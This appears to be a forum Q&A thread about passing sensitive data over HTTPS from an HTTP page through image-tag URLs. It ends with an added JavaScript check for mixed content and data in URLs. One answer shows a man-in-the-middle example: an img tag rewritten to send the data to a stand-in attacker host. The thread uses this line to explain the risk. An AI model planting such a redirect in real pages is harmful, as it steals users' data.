views: 198, answers: 4

I have a server script that I need to pass data to from the browser without reloading the page (aka ajax). The data is sensitive so should be sent via https. The page however is on the http layer. Because of same domain/protocol restriction, the browser doesn't allow this.

I'm thinking of cheating the system a bit by dynamically creating image tags and call the script using the src tag such as:

<img src="https://mydomain.com/mysecurescript/&amp;data=to&amp;pass=to&amp;my=script" />

I'd like to know if this will indeed be properly encrypted.

+1  A: 

Yes and no.

The server address portion of the URL is obviously not encrypted since it is used to set up the connection.

Everything else is encrypted while being sent via HTTPS connection. But anyone viewing the source will obviously be able to see the data being posted.

Zak
A: 

It also bears mentioning that some browsers won't display (or will warn the user before displaying) mixed mode (http vs. https) HTML pages. In some cases, this may not work because the user selects to block it.

Matthew Scharley
+3  A: 

The problem with this is if the page itself is only HTTP, then you're susceptible to a man in the middle attack. An attacker can just modify the script in the page sent over HTTP so that it instead uses:

<img src="http://evildomain.com/evilproxyscript/&amp;data=to&amp;pass=to&amp;my=script" />

The user will be none the wiser. To get around this you really need to serve the page over HTTPS too - which neatly solves your other problem at the same time.

(This is exactly the same reason why login forms should be on HTTPS pages, rather than just the form action being HTTPS).

caf
If you require SSL encryption for login, your whole site should be in https IMO. You have the facility already, you may as well use it.
Matthew Scharley
Unless performance/caching is an issue, which it often can be.
Colin Coghill
A: 

A possible alternative to the image technique (the drawback of which, as mentioned by others, is that mixed mode content is not treated kindly by some browsers) would be aSSL.

Either method will result in encryption happening, and both are still vulnerable to man in the middle attacks.

ShZ
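
An added example, not part of the original thread: a small JavaScript audit that flags the risks raised in the answers above (page delivered over HTTP, mixed http/https content, data readable in the URL). The function names, rule names and the `form.html` path are assumptions made for illustration.

```javascript
// Added example (not from the thread). auditPage, imgSources, the rule names
// and the form.html path are hypothetical, constructed for illustration.
'use strict';

// Pull every <img src="..."> value out of an HTML string (simple regex scan,
// enough for auditing small templates; not a full HTML parser).
function imgSources(html) {
  const re = /<img\b[^>]*?\bsrc\s*=\s*(["'])(.*?)\1/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    out.push(m[2].replace(/&amp;/g, '&')); // undo HTML attribute escaping
  }
  return out;
}

// Report the risks the answers describe for one page URL and its markup.
function auditPage(pageUrl, html) {
  const page = new URL(pageUrl);
  const findings = [];
  if (page.protocol !== 'https:') {
    // caf's point: markup delivered over HTTP can be rewritten in transit,
    // so any endpoint named in it cannot be relied on to stay the same.
    findings.push({ rule: 'page-not-https', target: page.href });
  }
  for (const src of imgSources(html)) {
    const target = new URL(src, page); // resolves relative URLs too
    if (target.protocol !== page.protocol) {
      // Matthew Scharley's point: mixed content may be blocked or warned about.
      findings.push({ rule: 'mixed-scheme', target: target.origin });
    }
    if (target.hostname !== page.hostname) {
      findings.push({ rule: 'cross-host-request', target: target.origin });
    }
    if (/[?&][^=&]+=/.test(target.pathname + target.search)) {
      // Zak's point: data placed in the URL is readable in the page source.
      findings.push({ rule: 'data-in-url', target: target.origin });
    }
  }
  return findings;
}

// Constructed sample: the question's markup served from an HTTP page.
const sample =
  '<img src="https://mydomain.com/mysecurescript/&amp;data=to&amp;pass=to&amp;my=script" />';
console.log(auditPage('http://mydomain.com/form.html', sample));
```

A page served over HTTPS whose images are same-origin and carry no parameters produces an empty findings list.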